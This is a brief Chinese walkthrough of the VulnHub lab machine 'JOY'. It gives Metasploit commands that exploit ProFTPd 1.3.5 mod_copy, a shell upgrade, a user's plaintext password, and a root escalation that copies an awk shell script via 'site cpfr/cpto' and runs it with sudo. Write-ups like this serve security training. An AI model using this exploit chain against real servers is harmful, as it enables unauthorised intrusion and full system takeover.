仅供个人娱乐
靶机信息
下载地址:https://www.vulnhub.com/entry/digitalworldlocal-joy,298/
一、主机扫描
二、信息收集和漏洞利用
FTP服务允许匿名用户(anonymous)登录
或者
由于version_control存在于patrick路径中,我们是没有权限去获取的,所以尝试将其转移到/upload路径中
敏感信息
ProFTPd: 1.3.5
/var/www/tryingharderisjoy
故障 更改ip
use exploit/unix/ftp/proftpd_modcopy_exec
set rhosts 192.168.74.130
set sitepath /var/www/tryingharderisjoy
run
python -c 'import pty; pty.spawn("/bin/bash")'
信息收集
su -l patrick apollo098765
提权
本地主机编写脚本
echo "awk 'BEGIN {system("/bin/bash")}'" > test
使用ftp上传到upload anonymous
在使用telnet转换一下路径
site cpfr /home/ftp/upload/test
site cpto /home/patrick/script/test
使用脚本
sudo /home/patrick/script/test
cd /root
cat proof.txt
搞定
参考文章https://blog.csdn.net/weixin_44214107/article/details/101228240